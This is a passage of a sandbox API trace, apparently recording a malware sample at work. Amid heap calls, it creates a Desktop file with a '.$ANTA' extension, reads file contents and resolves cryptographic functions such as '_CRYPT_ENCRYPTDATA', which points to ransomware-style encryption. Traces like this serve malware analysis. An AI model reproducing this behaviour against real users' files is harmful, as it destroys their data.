RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0134.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0134.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0134.959] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\xvNld.ots.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\xvnld.ots.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0134.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0134.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0134.959] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0134.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0134.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0134.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0134.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0134.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.960] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0134.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0134.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0134.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0134.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0134.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0134.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0134.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0134.960] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.960] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0134.960] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0134.960] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0134.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0134.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0134.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0134.960] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0134.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0134.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0134.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0134.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0134.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0134.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0134.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.961] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0134.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0134.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0134.961] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b80020 [0135.010] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0135.010] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0135.013] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x3845, lpOverlapped=0x0) returned 1 [0135.013] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0135.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0135.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0135.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0135.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0135.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13845) returned 0x49aa010 [0135.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b80020 | out: hHeap=0x1780000) returned 1 [0135.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0135.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0135.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0135.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0135.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0135.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13845) returned 0x49bd860 [0135.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0135.016] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0135.016] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0135.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0135.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0135.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0135.016] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13845) returned 0x49aa010 [0135.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0135.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0135.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0135.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0135.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0135.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0135.017] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0135.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0135.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0135.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0135.017] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0135.017] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0135.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0135.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28e0 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0135.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13845) returned 0x49aa010 [0135.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2790 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0135.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2770 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0135.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0135.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13845) returned 0x49d10b0 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0135.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0135.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0135.019] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0135.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0135.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0135.019] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0135.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0135.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0135.019] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0135.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0135.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0135.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2890 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0135.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caa90 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0135.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0135.020] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0135.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0135.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0135.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0135.021] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a00 [0135.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0135.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0135.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0135.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0135.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0135.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0135.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0135.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0135.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0135.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0135.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0135.021] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0135.021] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae50 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0135.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0135.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0135.022] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0135.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0135.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb030 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0135.022] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0135.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0135.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0135.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0135.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0135.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0135.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0135.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 